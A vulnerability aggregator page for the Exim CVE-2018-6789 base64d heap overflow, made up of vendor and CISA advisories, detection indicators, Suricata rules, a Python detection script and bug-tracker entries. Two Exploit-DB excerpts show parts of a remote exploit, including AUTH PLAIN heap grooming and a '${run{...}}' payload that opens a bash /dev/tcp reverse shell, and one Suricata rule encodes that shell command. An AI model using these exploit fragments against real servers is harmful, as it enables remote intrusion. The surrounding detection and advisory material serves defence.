CVE-2018-6789
Published 2018-02-08
CVE-2018-6789: An issue was discovered in the base64d function in the SMTP listener in Exim before 4.90.1. By sending a handcrafted message, a buffer overflow may happen…
Priority P196 · critical 9.8 · CVSS 3.1
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: KEV · ITW · EXPLOIT · Ransomware · Initial access
CISA Known Exploited Vulnerability, due 2022-05-03
Exploited in the wild
EPSS: 82.24% (99.6th percentile)
An issue was discovered in the base64d function in the SMTP listener in Exim before 4.90.1. By sending a handcrafted message, a buffer overflow may happen. This can be used to execute code remotely.
Affected (8 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | exim4 | < exim4 4.90.1-1 (bookworm) | exim4 4.90.1-1 (bookworm) |
| exim | exim | < 4.90.1 | 4.90.1 |
Detection & IOCs (extracted from sources)
- Detect exploitation attempts by monitoring SMTP AUTH PLAIN commands containing crafted/malformed base64 strings (missing or manipulated padding '=' characters) sent to Exim on port 25.
- Alert on Exim SMTP sessions where AUTH PLAIN payloads contain Exim expansion strings such as '${run{...}}'; this indicates an attempt to exploit the heap overflow for RCE via an ACL store block overwrite.
- Detect oversized EHLO strings (e.g., 8000+ bytes) in SMTP sessions targeting Exim, which are used during exploitation to manipulate the heap layout.
- Monitor for SMTP sessions sending large volumes of unrecognized/garbage commands (e.g., 0xFF-byte sequences) interleaved with AUTH PLAIN, indicative of heap grooming for this exploit.
- Identify Exim versions prior to 4.90.1 via SMTP banner grabbing; all such versions are vulnerable to CVE-2018-6789.
- Look for reverse shell callbacks over /dev/tcp from the Exim process, as the exploit payload uses bash's /dev/tcp redirection for the callback shell.
- The vulnerability is only exploitable if AUTH PLAIN (or another base64-using authentication mechanism) is advertised/enabled in the Exim SMTP listener configuration; the exploit checks for this and aborts if it is not available.
- The off-by-one heap overflow occurs in the base64d() function due to a miscalculated buffer length; the overwrite is triggered by sending an invalid base64 string (manipulated padding), so base64 input validation at a WAF/proxy level may reduce exposure.
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| osv | — | 9.8 | CRITICAL | — |
| vulncheck | — | 9.8 | CRITICAL | — |
| cisa | — | 9.8 | CRITICAL | — |
| vendor_debian | — | 9.8 | CRITICAL | — |
| vendor_redhat | — | 9.8 | CRITICAL | — |
CISA
Exim Buffer Overflow Vulnerability
cisa·2021-11-03·CVSS 9.8
CVE-2018-6789 [CRITICAL] CWE-119 Exim Buffer Overflow Vulnerability
Vulnerability: Exim Buffer Overflow Vulnerability
Affected: Exim Exim
Exim contains a buffer overflow vulnerability in the base64d function part of the SMTP listener that may allow for remote code execution.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2018-6789
Remediation Due Date: 2022-05-03
Ubuntu
Exim vulnerability
vendor_ubuntu·2018-02-12
CVE-2018-6789 Exim vulnerability
Title: Exim vulnerability
Summary: Exim could be made to crash or run programs if it received specially
crafted network traffic.
Meh Chang discovered that Exim incorrectly handled memory in certain
decoding operations. A remote attacker could use this issue to cause Exim
to crash, resulting in a denial of service, or possibly execute arbitrary
code.
Instructions: In general, a standard system update will make all the necessary changes.
Red Hat
exim: buffer overflow in b64decode() function, possibly leading to remote code execution
vendor_redhat·2018-02-07·CVSS 9.8
CVE-2018-6789 [CRITICAL] exim: buffer overflow in b64decode() function, possibly leading to remote code execution
exim: buffer overflow in b64decode() function, possibly leading to remote code execution
An issue was discovered in the base64d function in the SMTP listener in Exim before 4.90.1. By sending a handcrafted message, a buffer overflow may happen. This can be used to execute code remotely.
Statement: This issue affects the versions of Exim as shipped in Red Hat Enterprise Linux 5. Red Hat Enterprise Linux 5 is already in the Extended Life Phase of its life cycle and Exim is not on the list of components supported via Red Hat Enterprise Linux 5 Extended Life-cycle Support (ELS) add-on, therefore there's currently no plan to address this issue in Red Hat Enterprise Linux 5. For more information about Red Hat Enterprise Linux 5 life cycle and ELS add-on scope of support, see:
https://access.re
Debian
CVE-2018-6789: exim4 - An issue was discovered in the base64d function in the SMTP listener in Exim bef...
vendor_debian·2018·CVSS 9.8
CVE-2018-6789 [CRITICAL] CVE-2018-6789: exim4 - An issue was discovered in the base64d function in the SMTP listener in Exim bef...
An issue was discovered in the base64d function in the SMTP listener in Exim before 4.90.1. By sending a handcrafted message, a buffer overflow may happen. This can be used to execute code remotely.
Scope: local
bookworm: resolved (fixed in 4.90.1-1)
bullseye: resolved (fixed in 4.90.1-1)
forky: resolved (fixed in 4.90.1-1)
sid: resolved (fixed in 4.90.1-1)
trixie: resolved (fixed in 4.90.1-1)
GHSA
GHSA-868p-wr6f-7jfr: An issue was discovered in the base64d function in the SMTP listener in Exim before 4
ghsa_unreviewed·2022-05-13
CVE-2018-6789 [CRITICAL] CWE-119 GHSA-868p-wr6f-7jfr: An issue was discovered in the base64d function in the SMTP listener in Exim before 4
An issue was discovered in the base64d function in the SMTP listener in Exim before 4.90.1. By sending a handcrafted message, a buffer overflow may happen. This can be used to execute code remotely.
OSV
CVE-2018-6789: An issue was discovered in the base64d function in the SMTP listener in Exim before 4
osv·2018-02-08·CVSS 9.8
CVE-2018-6789 [CRITICAL] CVE-2018-6789: An issue was discovered in the base64d function in the SMTP listener in Exim before 4
An issue was discovered in the base64d function in the SMTP listener in Exim before 4.90.1. By sending a handcrafted message, a buffer overflow may happen. This can be used to execute code remotely.
VulnCheck
Exim Buffer Overflow Vulnerability
vulncheck·2018·CVSS 9.8
CVE-2018-6789 [CRITICAL] CWE-119 Exim Buffer Overflow Vulnerability
Exim Buffer Overflow Vulnerability
Exim contains a buffer overflow vulnerability in the base64d function part of the SMTP listener that may allow for remote code execution.
Affected: Exim Exim
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.csk.gov.in/alerts/STOP_ransomware.html; https://cisa.gov/news-events/cybersecurity-advisories/aa20-275a; https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF; https://us-cert.cisa.gov/ncas/alerts/aa20-275a; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.trustwave.com/hubfs/Web/Library/Documents_pdf/2024_Trustwave_Professional_Services_Sector_Threat_Landscape.pdf
Suricata
ET EXPLOIT Exim Internet Mailer Remote Code Execution
suricata·2018-07-09
CVE-2018-6789 ET EXPLOIT Exim Internet Mailer Remote Code Execution
ET EXPLOIT Exim Internet Mailer Remote Code Execution
Rule: alert smtp $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Exim Internet Mailer Remote Code Execution"; flow:established,to_server; content:"JHtydW57L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3Av"; reference:cve,2018-6789; reference:url,exploit-db.com/exploits/44571/; classtype:attempted-user; sid:2025793; rev:2; metadata:attack_target SMTP_Server, created_at 2018_07_09, cve CVE_2018_6789, deployment Datacenter, performance_impact Low, confidence High, signature_severity Major, updated_at 2019_07_26, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT [PT Security] Exim <4.90.1 Base64 Overflow RCE (CVE-2018-6789)
suricata·2018-03-13·CVSS 9.8
CVE-2018-6789 [CRITICAL] ET EXPLOIT [PT Security] Exim <4.90.1 Base64 Overflow RCE (CVE-2018-6789)
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:"ET EXPLOIT [PT Security] Exim <4.90.1 Base64 Overflow RCE (CVE-2018-6789)"; flow:established,to_server,only_stream; content:"|0D 0A|AUTH"; pcre:"/AUTH\s+\S+\s+(?:[a-zA-Z0-9\+\/=]{4})*+[a-zA-Z0-9\+\/=]{3}\s/"; reference:cve,2018-6789; reference:url,devco.re/blog/2018/03/06/exim-off-by-one-RCE-exploiting-CVE-2018-6789-en/; reference:url,github.com/ptresearch/AttackDetection/blob/master/CVE-2018-6789/cve-2018-6789.rules; classtype:attempted-admin; sid:2025427; rev:2; metadata:attack_target SMTP_Server, created_at 2018_03_13, cve CVE_2018_6789, deployment Perimeter, performance_impact Moderate, confidence Medium, signature_severity Major, tag CISA_KEV, updated_at 2024_03_17;)
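The AUTH PLAIN padding check that the PT Security rule's pcre encodes, together with the other indicators listed under Detection & IOCs above, as an added example in Python; it is not code from the page, Exim or the rule vendors, and the command set, the four-command garbage threshold and the sample session are assumptions:

```python
"""Heuristic scan of SMTP client lines for CVE-2018-6789 exploitation indicators.
Added example, not code from the page, Exim or the rule vendors."""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import List

AUTH_PLAIN_RE = re.compile(r"^AUTH\s+PLAIN\s+(\S+)\s*$", re.IGNORECASE)
HELO_RE = re.compile(r"^(?:EHLO|HELO)\s", re.IGNORECASE)
B64_SHAPE_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
EXPANSION_RE = re.compile(r"\$\{run\{")   # the only expansion item the page names
SMTP_COMMANDS = {"EHLO", "HELO", "MAIL", "RCPT", "DATA", "RSET", "NOOP", "QUIT",
                 "VRFY", "EXPN", "HELP", "AUTH", "STARTTLS", "BDAT", "ETRN"}
EHLO_OVERSIZE_CHARS = 8000    # size given in the page's detection notes
GARBAGE_RUN_THRESHOLD = 4     # assumption: unknown commands in a row before alerting


@dataclass
class Finding:
    line_no: int   # 1-based position in the session
    rule: str
    detail: str


def base64_padding_state(token: str) -> str:
    """'ok' when length % 4 == 0 (padding intact), 'missing_padding' for a
    remainder of 2 or 3 (the PT Security pcre matches the remainder-3 shape),
    'invalid' for bad characters or a remainder of 1, which base64 never has."""
    if not B64_SHAPE_RE.match(token):
        return "invalid"
    rem = len(token) % 4
    if rem == 0:
        return "ok"
    return "invalid" if rem == 1 else "missing_padding"


def lenient_b64decode(token: str) -> bytes:
    """Re-pad and decode so the payload can be inspected even without padding."""
    try:
        return base64.b64decode(token + "=" * (-len(token) % 4))
    except (binascii.Error, ValueError):
        return b""


def scan_session(lines: List[str]) -> List[Finding]:
    """Apply the page's indicators to the client side of one SMTP session."""
    findings: List[Finding] = []
    garbage_run = 0
    for no, raw in enumerate(lines, start=1):
        line = raw.rstrip("\r\n")
        if HELO_RE.match(line) and len(line) >= EHLO_OVERSIZE_CHARS:
            findings.append(Finding(no, "oversized_ehlo", f"{len(line)} chars"))
        verb = line.split(None, 1)[0].upper() if line.strip() else ""
        if verb not in SMTP_COMMANDS or not line.isascii() or not line.isprintable():
            garbage_run += 1   # e.g. raw 0xFF sequences interleaved with AUTH PLAIN
            if garbage_run == GARBAGE_RUN_THRESHOLD:
                findings.append(Finding(no, "garbage_command_run",
                                        f"{garbage_run} unrecognised commands in a row"))
            continue
        garbage_run = 0
        match = AUTH_PLAIN_RE.match(line)
        if not match:
            continue
        token = match.group(1)
        state = base64_padding_state(token)
        if state != "ok":
            findings.append(Finding(no, "auth_plain_bad_base64", f"{state}, len={len(token)}"))
        if EXPANSION_RE.search(lenient_b64decode(token).decode("latin-1")):
            findings.append(Finding(no, "exim_expansion_in_auth", "decoded blob contains ${run{"))
    return findings


def constructed_session() -> List[str]:
    """Constructed sample (not captured traffic) mixing benign and suspicious lines."""
    benign = base64.b64encode(b"\0alice\0s3cret").decode()               # padded, 20 chars
    stripped = base64.b64encode(b"\0bob\0pwd").decode().rstrip("=")      # 11 chars, %4 == 3
    expansion = base64.b64encode(b"\0user\0${run{echo test}}").decode()  # harmless stand-in
    return [
        "EHLO " + "A" * 8200,
        *["\xff\xff\xff\xff"] * 5,
        "EHLO mail.example.invalid",
        "AUTH PLAIN " + benign,
        "AUTH PLAIN " + stripped,
        "AUTH PLAIN " + expansion,
        "MAIL FROM:<>",
        "RCPT TO:<postmaster@example.invalid>",
    ]


if __name__ == "__main__":
    for f in scan_session(constructed_session()):
        print(f"line {f.line_no:>3}  {f.rule:<24} {f.detail}")
```

Run against real session logs, the padding check alone is a weak signal; the decoded-blob expansion match is the one worth paging on.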
Exploit-DB
exim 4.90 - Remote Code Execution
exploitdb·2018-10-24·CVSS 9.8
CVE-2018-6789 [CRITICAL] exim 4.90 - Remote Code Execution
exim 4.90 - Remote Code Execution
---
```python
# Exploit Title: exim 4.90 - Remote Code Execution
# Date: 2018-10-24
# Exploit Author: hackk.gr
# Vendor Homepage: exim.org
# Version: exim -1:
auth_plain_available = True
        if test:
            if len(l) > 70:
                sys.stdout.write(l[:70] + " ...\n")
                sys.stdout.flush()
            else:
                print l.strip("\r").strip("\n")
        data = data + l
        if data.find(delim) > -1:
            return data
        if l == "\n" or l == "":
            return ""
    return data
def write(data):
    f.write(data + "\n")
def ehlo(v):
    write("EHLO " + v)
    return readuntil('HELP')
def unrec(v):
    write(v)
    readuntil('command')
def auth_plain(v):
    encode = v.encode('base64').replace('\n','').replace('=','')
    write("AUTH PLAIN " + encode)
    l = f.readline()
    if test:
        if l.find("not advert") > -1 or l.find("not supported")> -1:
            raise Exception("NO AUTH PLAI
```
Exploit-DB
Exim < 4.90.1 - 'base64d' Remote Code Execution
exploitdb·2018-05-02·CVSS 9.8
CVE-2018-6789 [CRITICAL] Exim < 4.90.1 - 'base64d' Remote Code Execution
```python
Exim & /dev/tcp/" + local_host + "/" + str(local_port) + " 0>&1\""
    cmd_expansion_string = "${run{" + cmd + "}}\0"
    auth_plain("J" * acl_smtp_rcpt_offset + cmd_expansion_string + "J" * (8200 - acl_smtp_rcpt_offset - len(cmd_expansion_string)))
    print "[10] malloced ACL store block and overwrite the content of 'acl_smtp_rcpt' with shell expression"
    write("MAIL FROM:")
    readuntil("OK")
    write("RCPT TO:")
    print "[11] triggered RCPT TO and executing shell expression ... enjoy your shell!"
    print
if __name__ == '__main__':
    exploit()
```
HackerOne
Exim off-by-one RCE vulnerability
hackerone·2019-09-26·CVSS 9.8
CVE-2018-6789 [CRITICAL] Exim off-by-one RCE vulnerability
Exim off-by-one RCE vulnerability
Hi,
I found an off-by-one in an Exim MTA utility function. It was reported to exim and an official patch has been released, assigned CVE-2018-6789. This bug affects all versions of exim.
This bug is simple, but can be leveraged to gain remote code execution, using skillful heap exploitation. Details are here: https://devco.re/blog/2018/03/06/exim-off-by-one-RCE-exploiting-CVE-2018-6789-en/
I believe exim is widespread enough and it seems to fit all criteria. I wonder if this finding is worth a bounty, or the reason why it is not included. Thanks!
## Impact
Pre-auth remote code execution on all versions of exim mail server
Bugzilla
BLRG-PT-18-004: Off-By-One Write in SECU_FilePasswd()
bugzilla·2018-06-13·CVSS 9.8
[CRITICAL] BLRG-PT-18-004: Off-By-One Write in SECU_FilePasswd()
BLRG-PT-18-004: Off-By-One Write in SECU_FilePasswd()
In file sign/nss_secutil.c the function SECU_FilePasswd() iterated over the phrases array which was stored on the heap. The length of the array was stored in nb. In case the while loop exited because i == nb, the zero-termination which followed wrote past the end of the array.
This led to a memory corruption, which is likely hard to exploit, but off by one writes on the heap have been exploited in the past [1].
The affected component is only used locally and the password input data can be considered trusted to a certain degree. Therefore the impact is limited.
X41 D-Sec GmbH advises to check for i == nb before terminating the phrases buffer.
[1] https://devco.re/blog/2018/03/06/exim-off-by-one-RCE-exploiting-CVE-2018-6789-en/
Bugzilla
CVE-2018-6789 exim: Buffer overflow in utility function, when pre-conditions are met, can lead to remote code execution [fedora-all]
bugzilla·2018-02-08·CVSS 9.8
CVE-2018-6789 [CRITICAL] CVE-2018-6789 exim: Buffer overflow in utility function, when pre-conditions are met, can lead to remote code execution [fedora-all]
CVE-2018-6789 exim: Buffer overflow in utility function, when pre-conditions are met, can lead to remote code execution [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
Bugzilla
CVE-2018-6789 exim: Buffer overflow in utility function, when pre-conditions are met, can lead to remote code execution [epel-all]
bugzilla·2018-02-08·CVSS 9.8
CVE-2018-6789 [CRITICAL] CVE-2018-6789 exim: Buffer overflow in utility function, when pre-conditions are met, can lead to remote code execution [epel-all]
CVE-2018-6789 exim: Buffer overflow in utility function, when pre-conditions are met, can lead to remote code execution [epel-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of epel-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
Bugzilla
CVE-2018-6789 exim: buffer overflow in b64decode() function, possibly leading to remote code execution
bugzilla·2018-02-08·CVSS 9.8
CVE-2018-6789 [CRITICAL] CVE-2018-6789 exim: buffer overflow in b64decode() function, possibly leading to remote code execution
CVE-2018-6789 exim: buffer overflow in b64decode() function, possibly leading to remote code execution
In Exim 4.90 and earlier, there is a buffer overflow in an utility function, if some pre-conditions are met. Using a handcrafted message, remote code execution seems to be possible.
More information to follow.
Upstream advisory:
https://exim.org/static/doc/security/CVE-2018-6789.txt
Additional References:
https://bugzilla.novell.com/show_bug.cgi?id=1079832
http://seclists.org/oss-sec/2018/q1/133
Discussion:
Created exim tracking bugs for this issue:
Affects: epel-all [bug 1543269]
Affects: fedora-all [bug 1543270]
---
Upstream commit:
https://github.com/Exim/exim/commit/cf3cd306062a08969c41a1cdd32c6855f1abecf1
---
The issue here is a buffer overflow in the b64decode() functi
Qualys
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
blogs_qualys·2022-02-23
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
#### Table of Contents
- Situation
- Directive Scope
- CISA Catalog of Known Exploited Vulnerabilities
- Detect CISA Vulnerabilities Using Qualys VMDR
- CISA Exploited RTI
- Detailed Operational Dashboard
- Remediation
- Federal Enterprises and Agencies Can Act Now
- Summary
- Getting Started
CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively.
## Situation
Last November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv
Trendmicro
Manage Zero Day Exploits (ZDI) with Trend Micro Solutions
blogs_trendmicro·2021-04-28
Manage Zero Day Exploits (ZDI) with Trend Micro Solutions
Cyber Threats
## How Trend Micro Helps Manage Exploited Vulnerabilities
As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Read how Trend Micro protects customers from vulnerability exploits by blocking them as early as possible.
By: Jon Clay, Apr 28, 2021
As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Exploiting known vulnerabilities to successfully compromise an organization has long been a common tactic used by malicious actors. Whether Heartbleed, EternalBlue, or most recently Zerologon, threat actors take advantage of newly disclosed vulnerabilities in their attacks. But even with thousands of new vulnerabili
Tenable
Government Agencies Warn of State-Sponsored Actors Exploiting Publicly Known Vulnerabilities
blogs_tenable·2020-10-23
Government Agencies Warn of State-Sponsored Actors Exploiting Publicly Known Vulnerabilities
Qualys
NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities | Qualys
blogs_qualys·2020-10-22·CVSS 9.8
CVE-2020-15505 [CRITICAL] NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities | Qualys
#### Table of Contents
- Detect 25 Publicly Known Vulnerabilities using VMDR
Update November 25, 2020: The UK National Cyber Security Centre alerts that APT nation-state groups and cybercriminals are exploiting MobileIron RCE vulnerability (CVE-2020-15505).
Original post: On October 20, 2020, the United States National Security Agency (NSA) released a cybersecurity advisory on Chinese state-sponsored malicious cyber activity. The NSA alert provided a list of 25 publicly known vulnerabilities that are known to be recently leveraged by cyber actors for various hacking operations.
“Since these techniques include exploitation of publicly known vulnerabilities, it is critical that network defenders prioritize patching and
mitigation efforts,” said the NSA advisory. It also recommended “crit
Tenable
How COVID-19 Response Is Expanding the Cyberattack Surface
blogs_tenable·2020-03-30
How COVID-19 Response Is Expanding the Cyberattack Surface
Tenable
CVE-2019-15846: Unauthenticated Remote Command Execution Flaw Disclosed for Exim
blogs_tenable·2019-09-06·CVSS 9.8
[CRITICAL] CVE-2019-15846: Unauthenticated Remote Command Execution Flaw Disclosed for Exim
Tenable
Exim Buffer Overflow RCE Vulnerability (CVE-2018-6789) – What You Need to Know
blogs_tenable·2018-03-07·CVSS 9.8
CVE-2018-6789 [CRITICAL] Exim Buffer Overflow RCE Vulnerability (CVE-2018-6789) – What You Need to Know
# Exim Buffer Overflow RCE Vulnerability (CVE-2018-6789) – What You Need to Know
Scott Caveza
March 7, 2018
2 Min Read
On February 10, the Unix-based email server Exim released an update to address a heap buffer overflow vulnerability that can be used by an unauthenticated attacker to remotely execute arbitrary code. The flaw, assigned CVE-2018-6789, is noted to exist in all versions of Exim, prior to their latest release, 4.90.1, which means the attack surface potential is very wide. A quick search on Shodan yields more than 6 million results.
### Vulnerability details
The vulnerability was originally discovered by DEVCORE, and details were published on their blog on March 6. The vulnerability is due to a flaw in the b64decode buffer length in
References
- http://openwall.com/lists/oss-security/2018/02/10/2
- http://packetstormsecurity.com/files/162959/Exim-base64d-Buffer-Overflow.html
- http://www.openwall.com/lists/oss-security/2018/02/07/2
- http://www.securityfocus.com/bid/103049
- http://www.securitytracker.com/id/1040461
- https://devco.re/blog/2018/03/06/exim-off-by-one-RCE-exploiting-CVE-2018-6789-en/
- https://exim.org/static/doc/security/CVE-2018-6789.txt
- https://git.exim.org/exim.git/commit/cf3cd306062a08969c41a1cdd32c6855f1abecf1
- https://lists.debian.org/debian-lts-announce/2018/02/msg00009.html
- https://usn.ubuntu.com/3565-1/
- https://www.debian.org/security/2018/dsa-4110
- https://www.exploit-db.com/exploits/44571/
- https://www.exploit-db.com/exploits/45671/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2018-6789
2018-02-08: Published
2021-11-03: Added to CISA KEV
Exploited in the wild